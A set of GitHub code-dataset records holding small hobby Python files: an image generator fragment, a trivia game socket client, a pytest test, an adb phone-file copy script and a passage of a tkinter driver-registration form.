* sigmax**2)) * np.exp( -(y - y0)**2 / (2 *sigmay**2))))\n\t\treturn result\n\n\tfor i in range(size):\n\t\tfor j in range(size):\n\t\t\tarr[i][j] = Gaussian(i,j)\n\n\tim = Image.fromarray(arr)\n\tif im.mode !='RGB':\n\t\tim = im.convert('RGB')\n\t\t#im.show()\n\t\tim.save(\"/home/garrett/train/\"+str(n)+\".jpeg\", \"JPEG\")\n","repo_name":"gjepson/HAL-9000","sub_path":"imagegenerator.py","file_name":"imagegenerator.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"46493221889","text":"import socket\nimport chatlib # To use chatlib functions or consts, use chatlib.****\nimport time\n\nSERVER_IP = \"http://ec2-18-222-216-47.us-east-2.compute.amazonaws.com\" # Our server will run on same computer as client\nSERVER_PORT = 5678\n\n\n# mark: HELPER SOCKET METHODS\n\ndef build_and_send_message(conn, code, data):\n \"\"\"\n Builds a new message using chatlib, wanted code and message.\n Prints debug info, then sends it to the given socket.\n Paramaters: conn (socket object), code (str), data (str)\n Returns: Nothing\n \"\"\"\n masg_send = chatlib.build_message(code, data)\n # print(masg_send)\n conn.send(masg_send.encode())\n\n\ndef recv_message_and_parse(conn):\n \"\"\"\n Recieves a new message from given socket,\n then parses the message using chatlib.\n Paramaters: conn (socket object)\n Returns: cmd (str) and data (str) of the received message.\n If error occured, will return None, None\n \"\"\"\n\n full_msg = conn.recv(1024).decode()\n cmd, data = chatlib.parse_message(full_msg)\n return cmd, data\n\n\ndef connect():\n my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # my_socket.connect((IP, PORT))\n my_socket.connect((SERVER_IP, SERVER_PORT))\n print(\"connecting to \" + str(SERVER_IP) + \" port \" + str(SERVER_PORT))\n return my_socket\n\n\ndef error_and_exit(error_msg):\n print(error_msg)\n exit()\n\ndef build_send_recv_parse(conn, code, data):\n build_and_send_message(conn, code, data)\n return recv_message_and_parse(conn)\n\n# mark: The protocol\n\ndef login(conn):\n username = input(\"Please enter username: \\n\")\n password = input(\"Please enter password: \\n\")\n # username = \"abc\"\n # password = \"123\"\n user_pass = username + \"#\" + password\n login_success = False\n while login_success == False:\n build_and_send_message(conn, chatlib.PROTOCOL_CLIENT[\"login_msg\"], user_pass)\n server_recv = recv_message_and_parse(conn)\n print(server_recv[1])\n # mseg = chatlib.parse_message(server_recv)\n if chatlib.PROTOCOL_SERVER[\"login_ok_msg\"] in server_recv:\n print(\"Log in successfully!\")\n return True\n else:\n print(\"Connection failed\")\n return False\n\n\ndef logout(conn):\n build_and_send_message(conn, chatlib.PROTOCOL_CLIENT[\"logout_msg\"], \"\")\n conn.close()\n print(\"I closed the link with the server\")\n\n\ndef get_score(conn):\n server_recv = build_send_recv_parse(conn, chatlib.PROTOCOL_CLIENT[\"score_msg\"], \"\")\n print(\"your score is: \" + server_recv[1])\n\n\ndef get_highscore(conn):\n server_recv = build_send_recv_parse(conn, chatlib.PROTOCOL_CLIENT[\"highscore_msg\"], \"\")\n print(\"The highest score is: \\n\" + server_recv[1])\n\n\ndef play_question(conn):\n question = build_send_recv_parse(conn, chatlib.PROTOCOL_CLIENT[\"get_question\"], \"\")\n if question[0] == \"NO_QUESTIONS \":\n print(\"The server ran out of questions\")\n return\n question_data = question[1].split(\"#\")\n print(question_data[1])\n # print(question_data[2])\n\n user_question = input(\" a): \" + question_data[2] + \"\\n b): \" + question_data[3] + \"\\n c): \" + question_data[4] + \"\\n d): \" + question_data[5] + \"\\n your answer: \")\n if \"a\" in user_question or \"b\" in user_question or \"c\" in user_question or \"d\" in user_question:\n pass\n else:\n print(\"Please choose from the options! (a / b / c / d)\")\n user_question = input(\n \" a): \" + question_data[2] + \"\\n b): \" + question_data[3] + \"\\n c): \" + question_data[4] + \"\\n d): \" +\n question_data[5] + \"\\n your answer: \")\n\n unsers = {\"a\": \"1\",\n \"b\": \"2\",\n \"c\": \"3\",\n \"d\": \"4\"\n }\n correct_answer = build_send_recv_parse(conn, chatlib.PROTOCOL_CLIENT[\"send_answer\"], str(question_data[0]) + \"#\" + str(unsers[user_question]))\n if correct_answer[0] == \"CORRECT_ANSWER\":\n print(\"Well done correct answer!\")\n elif correct_answer[0] == \"WRONG_ANSWER\":\n print(\"Wrong, the correct answer is: \" + question_data[int(correct_answer[1]) + 1])\n else:\n error_and_exit(\"question_data\")\n\ndef get_logged_users(conn):\n players_connected = build_send_recv_parse(conn, chatlib.PROTOCOL_CLIENT[\"players_connected\"], \"\")\n players_connected_list = players_connected[1].split(\",\")\n players_connected_str = \"Number of players connected: \" + str(len(players_connected_list))\n for name in players_connected_list:\n players_connected_str += \"\\n\" + name\n return players_connected_str\n\n\n\n\ndef main():\n my_socket = connect()\n if login(my_socket) == False:\n return\n print(\"\\n\")\n while True:\n user_input = input(\"\"\"what would you like to do? \\n p Play a trivia question \\n s Get my score \\n h Get high score \\n c Get connected users \\n q Exit \\n Please enter your choice: \"\"\")\n if user_input == \"s\":\n get_score(my_socket)\n elif user_input == \"h\":\n get_highscore(my_socket)\n elif user_input == \"p\":\n play_question(my_socket)\n elif user_input == \"c\":\n print(get_logged_users(my_socket))\n elif user_input == \"q\":\n logout(my_socket)\n return\n else:\n print(user_input + \" is not option\")\n # play_question(my_socket)\nif __name__ == '__main__':\n main()\n","repo_name":"Aviv05423/NetworkTrivia","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73478623550","text":"import pytest\n\nfrom tests.utils import pretty_results, bug_1224, bug_1225, reciprocal,\\\n sqrt, square, error_msg\n\n\ntest_data_single_operand = (\n # template: [operation, operand, expected_result]\n\n pytest.param(reciprocal, 0, error_msg, marks=bug_1225),\n [reciprocal, -2, -0.5],\n [sqrt, 1, 1],\n [sqrt, 4, 2],\n [sqrt, 0, 0],\n pytest.param(sqrt, -1, error_msg, marks=bug_1224),\n [square, 0, 0],\n [square, 1, 1],\n [square, 2, 4],\n [square, -1, 1]\n)\n\n\n@pytest.mark.parametrize(\"operation, x, y\", test_data_single_operand,\n ids=pretty_results(test_data_single_operand))\ndef test_operations(operation, x, y):\n assert operation(x) == y\n","repo_name":"ifar/tech3camp-pytest","sub_path":"tests/operations/test_9_interesting.py","file_name":"test_9_interesting.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"14515427086","text":"import os\nimport time\nimport colorama\nfrom colorama import Fore, Style, Back\n\ndef PC_path():\n\ttry:\n\t\tprint (Fore.GREEN)\n\t\tprint (\"You can input PC path manual\")\n\t\tprint(Style.RESET_ALL)\n\t\tPC_path = input (\"PC path of phone: \")\n\t\tprint(\"OK\")\n\t\tif PC_path ==\"\":\n\t\t\tPC_path\t= \".\"\n\t\tprint(PC_path)\n\texcept OSError:\n\t\tprint (\"Don`t read path \")\n\telse:\n\t\tprint (\"Function back PC path \", BP_path[0])\n\t\treturn PC_path , OSError\n\ndef base_phone_path(path):\n\ttry:\n\t\tBPpath_file = path +\"/base_path_phone.txt\"\n\t\tf=open(BPpath_file, \"r\")\n\t\tBP_path = f.read().strip()\n\texcept OSError:\n\t\tprint (\"Don`t read path \")\n\telse:\n\t\tprint (\"Function back base phone path \", BP_path)\n\t\treturn BP_path , OSError\n\ndef final_phone_path():\n\ttry:\n\t\tprint (Fore.RED)\n\t\tprint (\"1 - bluetooth\")\n\t\tprint (\"2 - DCIM\")\n\t\tprint (\"3 - documents\")\n\t\tprint (\"4 - Download\")\n\t\tprint (\"5 - Fonts\")\n\t\tprint (\"6 - inshot\")\n\t\tprint (\"7 - MIUI/sound_recorder\")\n\t\tprint (\"8 - Movies\")\n\t\tprint (\"9 - Music\")\n\t\tprint (\"10 - Pictures\")\n\t\tprint (\"11 - Ringtones\")\n\t\tprint (\"12 - Telegram\")\n\t\tprint (\"13 - viber\")\n\t\tprint (\"14 - Whatsapp/media\")\n\t\tprint (\"15 - youcut\")\n\t\tprint (\"100 - /data/data/com.termux/files/home\")\n\t\tprint (\"all - Copy all items\")\n\t\tprint(Style.RESET_ALL)\n\t\tchoise = input (\"Choise of the Directory for copy : \")\n\n\t\tif choise == \"1\":\n\t\t\tFP_path = \"bluetooth\"\n\t\telif choise == \"2\":\n\t\t\tFP_path = \"DCIM\"\n\t\telif choise == \"3\":\n\t\t\tFP_path = \"documents\"\n\t\telif choise == \"4\":\n\t\t\tFP_path = \"Download\"\n\t\telif choise == \"5\":\n\t\t\tFP_path = \"Fonts\"\n\t\telif choise == \"6\":\n\t\t\tFP_path = \"inshot\"\n\t\telif choise == \"7\":\n\t\t\tFP_path = \"MIUI/sound_recorder\"\n\t\telif choise == \"8\":\n\t\t\tFP_path = \"Movies\"\n\t\telif choise == \"9\":\n\t\t\tFP_path = \"Music\"\n\t\telif choise == \"10\":\n\t\t\tFP_path = \"Pictures\"\n\t\telif choise == \"11\":\n\t\t\tFP_path = \"Ringtones\"\n\t\telif choise == \"12\":\n\t\t\tFP_path = \"Telegram\"\n\t\telif choise == \"13\":\n\t\t\tFP_path = \"viber\"\n\t\telif choise == \"14\":\n\t\t\tFP_path = \"Whatsapp/Media\"\n\t\telif choise == \"15\":\n\t\t\tFP_path = \"youcut\"\n\t\telif choise == \"100\":\n\t\t\tFP_path = \"/data/data/com.termux/files/home\"\n\t\telif choise == \"all\":\n\t\t\tFP_path = \"/data/data/com.termux/files/home\"\n\texcept OSError:\n\t\tprint (\"Don`t read path \")\n\telse:\n\t\tprint (Fore.BLUE)\n\t\tprint (\"Function back final phone path: \", FP_path)\n\t\tprint(Style.RESET_ALL)\n\t\treturn FP_path , choise, OSError\n\n#adb pull /storage/emulated/0/DCIM/Screenshots/ /media/korolevsa/Files/55/1\\ NTFS/sort/перенос\\ файлов/DCIM/\n\ntry:\n\tpath = os.getcwd()\n\tBP_path = \"/storage/emulated/0\"\n\tBP_path = base_phone_path(path)\n\tprint (Fore.BLUE)\n\tprint (\"default base path of phone = \" + BP_path[0])\n\tprint (\"You can input base path manual\")\n\tprint(Style.RESET_ALL)\n\trez_inp = input (\"Base path of phone: \")\n\tprint(BP_path[0])\n\tprint(\"OK\")\n\tif rez_inp !=\"\":\n\t\tBP_path\t= rez_inp\n\tFP_path = final_phone_path()\n\tPC_path = PC_path()\n\tprint(FP_path[1])\n\n\tif FP_path[1] == \"bluetooth\" or FP_path[1] == \"DCIM\" or FP_path[1] == \"documents\" or FP_path[1] == \"Download\" or FP_path[1] == \"Fonts\" or FP_path[1] == \"inshot\" or FP_path[1] == \"MIUI/sound_recorder\" or FP_path[1] == \"Movies\" or FP_path[1] == \"Music\" or FP_path[1] == \"Pictures\" or FP_path[1] == \"Ringtones\" or FP_path[1] == \"Telegram\" or FP_path[1] == \"viber\" or FP_path[1] == \"Whatsapp/Media\" or FP_path[1] == \"youcut\" or FP_path[1] == \"/data/data/com.termux/files/home\":\n\t\tprint (Fore.MAGENTA)\n\t\tprint(\"su adb pull \"+ FP_path[0] +\" \"+ PC_path[0])\n\t\tos.system(\"su adb pull \" + FP_path[0] +\" \"+ PC_path[0])\n\t\tprint(Style.RESET_ALL)\n\telse:\n\t\tprint (Back.MAGENTA + Fore.YELLOW + Style.BRIGHT)\n\t\tprint(\"adb pull \"+ BP_path[0] + \"/\" + FP_path[0] +\" \"+ PC_path[0])\n\t\tos.system(\"adb pull \"+ BP_path[0] + \"/\" + FP_path[0] +\" \"+ PC_path[0])\n\t\tprint(Style.RESET_ALL)\n\nexcept OSError:\n\tprint (\"Runtime error\")\nelse:\n\tprint (\"Success\")\n\n\n\nprint (\"All line are processed\")\n","repo_name":"serhio1212/mob_script","sub_path":"files_management/down_files_with_phone.py","file_name":"down_files_with_phone.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"3319797884","text":"from tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkcalendar import DateEntry\r\n\r\nglobal driver_no_entry, pda_password_entry, driver_no_entry, pda_password_entry, pda_vr, mobile_vr, driver_blocked_vr\r\nglobal driver_first_name_entry, driver_last_name_entry, driver_gender_vr, driver_birthday_vr, driver_address_1_entry\r\nglobal driver_address_2_entry\r\nglobal driver_home_phone_entry, driver_mobile_entry, driver_date_joined_vr, driver_date_left_vr\r\nglobal driver_national_insurance_entry, driver_license_entry, driver_penalties_vr, driver_pco_entry\r\nglobal driver_pco_exp_vr, driver_town_entry, driver_postcode_entry\r\nglobal insurance_premium_entry, insurance_ex_vr, road_expiry_vr, pco_number_entry, pco_expiry_vr\r\nglobal veh_reg_entry, veh_make_entry, veh_model_entry, veh_color_entry, veh_category_vr, veh_ownership_vr\r\nglobal type_vehicle_vr, deposit_entry, base_vr, radio_vr, outstanding_b_entry, commission_rate_vr\r\nglobal commission_rate_acc_vr, rent_entry, salary_entry\r\n\r\n\r\ndef saver():\r\n from new_driver_database import save\r\n save()\r\n\r\n\r\ndef addnew_driver(notebook, screen_width, screen_height):\r\n driver_top = Frame(notebook, width=screen_width, height=screen_height)\r\n notebook.add(driver_top, text=\"New Driver\")\r\n driver_top.update()\r\n\r\n # _________add_new_driver frame________\r\n add_new_driver_frame = Frame(driver_top, bg=\"red\")\r\n add_new_driver_frame.place(x=0, y=0, height=(screen_height), width=(screen_width))\r\n add_new_driver_frame.update()\r\n frame_width = add_new_driver_frame.winfo_width()\r\n frame_height = add_new_driver_frame.winfo_height()\r\n\r\n # __________ Driver login information___________\r\n driver_login_info = LabelFrame(add_new_driver_frame, text=\"Login Information\", bg=\"green\", font=(\"Arial\", 12))\r\n driver_login_info.place(x=frame_width * 0.05, y=frame_height * 0.01, height=frame_height * 0.2,\r\n width=frame_width * 0.4)\r\n # ______Labels______\r\n driver_no = Label(driver_login_info, text=\"Driver NO\", font=(\"Arial\", 12))\r\n pda_password = Label(driver_login_info, text=\"PDA Password\", font=(\"Arial\", 12))\r\n device = Label(driver_login_info, text=\"Device\", font=(\"Arial\", 12))\r\n driver_blocked = Label(driver_login_info, text=\"Driver Blocked\", font=(\"Arial\", 12))\r\n driver_no.grid(row=0, column=0, pady=5, padx=5)\r\n pda_password.grid(row=0, column=3, pady=5, padx=5)\r\n device.grid(row=1, column=0, pady=5, padx=5)\r\n driver_blocked.grid(row=1, column=3, pady=5, padx=5)\r\n # _______Actions_________\r\n global driver_no_entry, pda_password_entry, driver_no_entry, pda_password_entry, pda_vr, mobile_vr, driver_blocked_vr\r\n driver_no_entry = Entry(driver_login_info)\r\n pda_password_entry = Entry(driver_login_info)\r\n driver_no_entry.grid(row=0, column=1, pady=5, padx=5, columnspan=2)\r\n pda_password_entry.grid(row=0, column=4, pady=5, padx=5)\r\n pda_vr = IntVar()\r\n pda_check_box = Checkbutton(driver_login_info, variable=pda_vr, font=(\"Arial\", 12), onvalue=0, offvalue=1,\r\n text=\"PDA\")\r\n pda_check_box.deselect()\r\n pda_check_box.grid(row=1, column=1, pady=5, padx=5)\r\n mobile_vr = IntVar()\r\n mobile_box = Checkbutton(driver_login_info, font=(\"Arial\", 12), variable=mobile_vr, onvalue=0, offvalue=1,\r\n text=\"Mobile\")\r\n mobile_box.deselect()\r\n mobile_box.grid(row=1, column=2, pady=5, padx=5)\r\n driver_blocked_vr = IntVar()\r\n driver_blocked_box = Checkbutton(driver_login_info, font=(\"Arial\", 12), variable=driver_blocked_vr, onvalue=0,\r\n offvalue=1,\r\n text=\"Blocked\")\r\n driver_blocked_box.deselect()\r\n driver_blocked_box.grid(row=1, column=4, pady=5, padx=5)\r\n\r\n # __________ Driver personal information___________\r\n driver_personal_info = LabelFrame(add_new_driver_frame, text=\"Personal Information\", bg=\"blue\")\r\n driver_personal_info.place(x=frame_width * 0.05, y=frame_height * 0.15, height=frame_height * 0.39,\r\n width=frame_width * 0.4)\r\n\r\n # _ Labels and actions\r\n driver_first_name_label = Label(driver_personal_info, text=\"First Name\", font=(\"Arial\", 12))\r\n driver_last_name_label = Label(driver_personal_info, text=\"Last Name\", font=(\"Arial\", 12))\r\n driver_gender_label = Label(driver_personal_info, text=\"Gender\", font=(\"Arial\", 12))\r\n driver_birthday_label = Label(driver_personal_info, text=\"DOB\", font=(\"Arial\", 12))\r\n driver_address_1 = Label(driver_personal_info, text=\"Address ln1\", font=(\"Arial\", 12))\r\n driver_address_2 = Label(driver_personal_info, text=\"Address ln2\", font=(\"Arial\", 12))\r\n driver_town = Label(driver_personal_info, text=\"Town\", font=(\"Arial\", 12))\r\n driver_postcode = Label(driver_personal_info, text=\"Postcode\", font=(\"Arial\", 12))\r\n driver_home_phone = Label(driver_personal_info, text=\"Ho Phone\", font=(\"Arial\", 12))\r\n driver_mobile = Label(driver_personal_info, text=\"Mobile\", font=(\"Arial\", 12))\r\n driver_date_joined = Label(driver_personal_info, text=\"Date Joined\", font=(\"Arial\", 12))\r\n driver_date_left = Label(driver_personal_info, text=\"Date Left\", font=(\"Arial\", 12))\r\n driver_national_insurance = Label(driver_personal_info, text=\"N.I.C\", font=(\"Arial\", 12))\r\n driver_license = Label(driver_personal_info, text=\"Dri License\", font=(\"Arial\", 12))\r\n driver_penalties = Label(driver_personal_info, text=\"Penalties.Pts\", font=(\"Arial\", 12))\r\n driver_pco = Label(driver_personal_info, text=\"PCO No\", font=(\"Arial\", 12))\r\n driver_pco_exp = Label(driver_personal_info, text=\"PCO Exp\", font=(\"Arial\", 12))\r\n # _____________Actions________________\r\n driver_first_name_label.grid(row=0, column=0, pady=(5, 2), padx=5)\r\n global driver_first_name_entry, driver_last_name_entry, driver_gender_vr, driver_birthday_vr, driver_address_1_entry\r\n global driver_address_2_entry, insurance_ex_vr\r\n global driver_home_phone_entry, driver_mobile_entry, driver_date_joined_vr, driver_date_left_vr\r\n global driver_national_insurance_entry, driver_license_entry, driver_penalties_vr, driver_pco_entry\r\n global driver_pco_exp_vr, driver_town_entry, driver_postcode_entry\r\n global insurance_premium_entry, insurance_ex_v, road_expiry_vr, pco_number_entry, pco_expiry_vr\r\n global veh_reg_entry, veh_make_entry, veh_model_entry, veh_color_entry, veh_category_vr, veh_ownership_vr\r\n driver_first_name_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_first_name_entry.grid(row=0, column=1, pady=(5, 2), padx=5)\r\n # ______________\r\n driver_last_name_label.grid(row=0, column=2, pady=(5, 2), padx=5)\r\n driver_last_name_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_last_name_entry.grid(row=0, column=3, pady=(5, 2), padx=5)\r\n # --------------------------------\r\n driver_gender_label.grid(row=1, column=0, pady=2, padx=5)\r\n driver_gender_vr = StringVar()\r\n driver_gender_box = ttk.Combobox(driver_personal_info, width=13, textvariable=driver_gender_vr, font=(\"Arial\", 12))\r\n driver_gender_box['values'] = (\"Male\", \"Female\")\r\n driver_gender_box.grid(row=1, column=1, pady=2, padx=5)\r\n driver_gender_box.current(0)\r\n # --------------------------------\r\n driver_birthday_label.grid(row=1, column=2, pady=2, padx=5)\r\n driver_birthday_vr = StringVar()\r\n driver_birthday_pick = DateEntry(driver_personal_info, width=13, selectmode=\"day\", textvariable=driver_birthday_vr,\r\n font=(\"Arial\", 12))\r\n driver_birthday_pick.grid(row=1, column=3, pady=2, padx=5)\r\n # ___________________________________\r\n driver_address_1.grid(row=2, column=0, pady=2, padx=5)\r\n driver_address_1_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_address_1_entry.grid(row=2, column=1, pady=2, padx=5)\r\n # --------------------------------\r\n driver_address_2.grid(row=2, column=2, pady=2, padx=5)\r\n driver_address_2_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_address_2_entry.grid(row=2, column=3, pady=5, padx=5)\r\n # --------------------------------\r\n driver_town.grid(row=3, column=0, pady=2, padx=5)\r\n driver_town_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_town_entry.grid(row=3, column=1, pady=2, padx=5)\r\n # --------------------------------\r\n driver_postcode.grid(row=3, column=2, pady=2, padx=5)\r\n driver_postcode_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_postcode_entry.grid(row=3, column=3, pady=2, padx=5)\r\n # --------------------------------\r\n driver_home_phone.grid(row=4, column=0, pady=2, padx=5)\r\n driver_home_phone_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_home_phone_entry.grid(row=4, column=1, pady=2, padx=5)\r\n driver_mobile.grid(row=4, column=2, pady=2, padx=5)\r\n driver_mobile_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_mobile_entry.grid(row=4, column=3, pady=2, padx=5)\r\n # ____________________________________\r\n driver_date_joined.grid(row=5, column=0, pady=2, padx=5)\r\n driver_date_joined_vr = StringVar()\r\n driver_date_joined_pick = DateEntry(driver_personal_info, width=13, selectmode=\"day\",\r\n textvariable=driver_date_joined_vr, font=(\"Arial\", 12))\r\n driver_date_joined_pick.grid(row=5, column=1, pady=2, padx=5)\r\n driver_date_left.grid(row=5, column=2, pady=2, padx=5)\r\n driver_date_left_vr = StringVar()\r\n driver_date_left_pick = DateEntry(driver_personal_info, width=13, selectmode=\"day\",\r\n textvariable=driver_date_left_vr, font=(\"Arial\", 12))\r\n driver_date_left_pick.grid(row=5, column=3, pady=2, padx=5)\r\n # ______________________________________\r\n driver_national_insurance.grid(row=6, column=0, pady=2, padx=5)\r\n driver_national_insurance_entry = Entry(driver_personal_info, width=15, font=(\"Arial\", 12))\r\n driver_national_insurance_entry.grid(row=6, column=1, pady=2, padx=5)\r\n driver_license.grid(row=6, column=2, pady=2, padx=5)\r\n driver_license_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_license_entry.grid(row=6, column=3, pady=2, padx=5)\r\n # --------------------------\r\n driver_penalties.grid(row=7, column=0, pady=2, padx=5)\r\n driver_penalties_vr = IntVar()\r\n driver_penalties_spin = ttk.Spinbox(driver_personal_info, width=13, from_=0, to=5, textvariable=driver_penalties_vr,\r\n font=(\"Arial\", 12))\r\n driver_penalties_spin.grid(row=7, column=1, pady=2, padx=5)\r\n driver_penalties_spin.set(0)\r\n # ____________________________\r\n driver_pco.grid(row=7, column=2, pady=2, padx=5)\r\n driver_pco_entry = Entry(driver_personal_info, font=(\"Arial\", 12), width=15)\r\n driver_pco_entry.grid(row=7, column=3, pady=2, padx=5)\r\n driver_pco_exp.grid(row=8, column=0, pady=2, padx=5)\r\n driver_pco_exp_vr = StringVar()\r\n driver_pco_exp_pick = DateEntry(driver_personal_info, width=13, selectmode=\"day\", textvariable=driver_pco_exp_vr,\r\n font=(\"Arial\", 12))\r\n driver_pco_exp_pick.grid(row=8, column=1, pady=2, padx=5)\r\n\r\n # __________ Vehicle details___________\r\n vehicle_details = LabelFrame(add_new_driver_frame, text=\"Vehicle Details\", bg=\"yellow\")\r\n vehicle_details.place(x=frame_width * 0.47, y=frame_height * 0.013, height=frame_height * 0.4,\r\n width=frame_width * 0.45)\r\n\r\n # _________________ label_______________\r\n veh_reg = Label(vehicle_details, text=\"Vehicle Registration\", font=(\"Arial\", 12))\r\n veh_make = Label(vehicle_details, text=\"Vehicle Make\", font=(\"Arial\", 12))\r\n veh_model = Label(vehicle_details, text=\"Vehicle Model\", font=(\"Arial\", 12))\r\n veh_color = Label(vehicle_details, text=\"Vehicle Color\", font=(\"Arial\", 12))\r\n veh_category = Label(vehicle_details, text=\"Category\", font=(\"Arial\", 12))\r\n veh_ownership = Label(vehicle_details, text=\"Ownership\", font=(\"Arial\", 12))\r\n # _______________Actions________\r\n\r\n veh_reg.grid(row=0, column=0, pady=2, padx=5)\r\n veh_reg_entry = Entry(vehicle_details, font=(\"Arial\", 12), width=15)\r\n veh_reg_entry.grid(row=0, column=1, pady=2, padx=5)\r\n veh_make.grid(row=0, column=2, pady=2, padx=5)\r\n veh_make_entry = Entry(vehicle_details, font=(\"Arial\", 12), width=15)\r\n veh_make_entry.grid(row=0, column=3, pady=2, padx=5)\r\n veh_model.grid(row=1, column=0, pady=2, padx=5)\r\n veh_model_entry = Entry(vehicle_details, font=(\"Arial\", 12), width=15)\r\n veh_model_entry.grid(row=1, column=1, pady=2, padx=5)\r\n veh_color.grid(row=1, column=2, pady=2, padx=5)\r\n veh_color_entry = Entry(vehicle_details, font=(\"Arial\", 12), width=15)\r\n veh_color_entry.grid(row=1, column=3, pady=2, padx=5)\r\n veh_category.grid(row=2, column=0, pady=2, padx=5)\r\n veh_category_vr = StringVar()\r\n veh_category_com = ttk.Combobox(vehicle_details, width=13, textvariable=veh_category_vr, font=(\"Arial\", 12))\r\n veh_category_com['values'] = (\"Any Car\", \"MPV5\", \"MPV6\", \"MPV7\", \"MPV8\")\r\n veh_category_com.set(\"Any Car\")\r\n veh_category_com.grid(row=2, column=1, pady=2, padx=5)\r\n veh_ownership.grid(row=2, column=2, pady=2, padx=5)\r\n veh_ownership_vr = StringVar()\r\n veh_ownership_com = ttk.Combobox(vehicle_details, width=13, textvariable=veh_ownership_vr, font=(\"Arial\", 12))\r\n veh_ownership_com['values'] = (\"Personal\", \"Company\")\r\n veh_ownership_com.set(\"Personal\")\r\n veh_ownership_com.grid(row=2, column=3, pady=2, padx=5)\r\n\r\n # __________ Driver expiry details___________\r\n expiry_details = LabelFrame(add_new_driver_frame, text=\"Expiry Details\", bg=\"gray\")\r\n expiry_details.place(x=frame_width * 0.47, y=frame_height * 0.15, height=frame_height * 0.3,\r\n width=frame_width * 0.45)\r\n\r\n # _______label______________\r\n insurance_premium = Label(expiry_details, text=\"Insur. Premium\", font=(\"Arial\", 12))\r\n insurance_expiry = Label(expiry_details, text=\"Insur. Expiry\", font=(\"Arial\", 12))\r\n mot_expiry = Label(expiry_details, text=\"MOT Expiry\", font=(\"Arial\", 12))\r\n road_expiry = Label(expiry_details, text=\"Rd Tx Ex\", font=(\"Arial\", 12))\r\n pco_number = Label(expiry_details, text=\"PCO Num\", font=(\"Arial\", 12))\r\n pco_expiry = Label(expiry_details, text=\"PCO Exp Vehi\", font=(\"Arial\", 12))\r\n # _______________Actions_______________\r\n\r\n insurance_premium.grid(row=0, column=0, pady=2, padx=5)\r\n insurance_premium_entry = Entry(expiry_details, width=20)\r\n insurance_premium_entry.grid(row=0, column=1)\r\n # _____________________________________\r\n insurance_expiry.grid(row=0, column=2, pady=2, padx=5)\r\n insurance_ex_vr = StringVar()\r\n insurance_ex_picker = DateEntry(expiry_details, selectmode=\"day\", textvariable=insurance_ex_vr, font=(\"Arial\", 12),\r\n width=13)\r\n insurance_ex_picker.grid(row=0, column=3, pady=2, padx=5)\r\n # ______________________________________\r\n mot_expiry.grid(row=1, column=0, pady=2, padx=5)\r\n mot_expiry_vr = StringVar()\r\n mot_expiry_picker = DateEntry(expiry_details, selectmode=\"day\", textvariable=mot_expiry_vr, font=(\"Arial\", 12),\r\n width=13)\r\n mot_expiry_picker.grid(row=1, column=1, pady=2, padx=5)\r\n\r\n # _____________________________\r\n road_expiry.grid(row=1, column=2, pady=2, padx=5)\r\n road_expiry_vr = StringVar()\r\n road_expiry_picker = DateEntry(expiry_details, selectmode=\"day\", textvariable=road_expiry_vr, font=(\"Arial\", 12),\r\n width=13)\r\n road_expiry_picker.grid(row=1, column=3, pady=2, padx=5)\r\n # ______________________\r\n pco_number.grid(row=4, column=0, pady=2, padx=5)\r\n pco_number_entry = Entry(expiry_details, font=(\"Arial\", 12), width=15)\r\n pco_number_entry.grid(row=4, column=1, pady=2, padx=5)\r\n pco_expiry.grid(row=4, column=2, pady=2, padx=5)\r\n pco_expiry_vr = StringVar()\r\n pco_expiry_picker = DateEntry(expiry_details, selectmode=\"day\", textvariable=pco_expiry_vr, font=(\"Arial\", 12),\r\n width=13)\r\n pco_expiry_picker.grid(row=4, column=3, pady=2, padx=5)\r\n # __________ Payment mode___________\r\n payment_mode = LabelFrame(add_new_driver_frame, text=\"Payment Mode\", bg=\"orange\")\r\n payment_mode.place(x=frame_width * 0.47, y=frame_height * 0.32, height=frame_height * 0.22,\r\n width=frame_width * 0.45)\r\n # _________________Label_________________\r\n type_vehicle = Label(payment_mode, text=\" Pay Type\", font=(\"Arial\", 12), )\r\n deposit = Label(payment_mode, text=\"Deposit\", font=(\"Arial\", 12))\r\n base = Label(payment_mode, text=\"BaseRent\", font=(\"Arial\", 12))\r\n radio = Label(payment_mode, text=\"PDA Rent\", font=(\"Arial\", 12))\r\n outstanding_b = Label(payment_mode, text=\"Out Balance\", font=(\"Arial\", 12))\r\n commission_rate = Label(payment_mode, text=\"Comm Rate\", font=(\"Arial\", 12))\r\n commission_rate_acc = Label(payment_mode, text=\" Acc Comm Rate\", font=(\"Arial\", 12))\r\n rent = Label(payment_mode, text=\"Rent\", font=(\"Arial\", 12))\r\n salary = Label(payment_mode, text=\" Daily Salary\", font=(\"Arial\", 12))\r\n # _________________Action___________________\r\n global type_vehicle_vr, deposit_entry, base_vr, radio_vr, outstanding_b_entry, commission_rate_vr, commission_rate_acc_vr\r\n global rent_entry, salary_entry\r\n type_vehicle.grid(row=0, column=0, pady=2, padx=5)\r\n type_vehicle_vr = StringVar()\r\n type_vehicle_com = ttk.Combobox(payment_mode, textvariable=type_vehicle_vr, font=(\"Arial\", 12), width=13)\r\n type_vehicle_com[\"value\"] = (\"Rent\", \"Commission\")\r\n type_vehicle_com.set(\"Commission\")\r\n type_vehicle_com.grid(row=0, column=1, pady=2, padx=5)\r\n deposit.grid(row=0, column=2, pady=2, padx=5)\r\n deposit_entry = Entry(payment_mode, 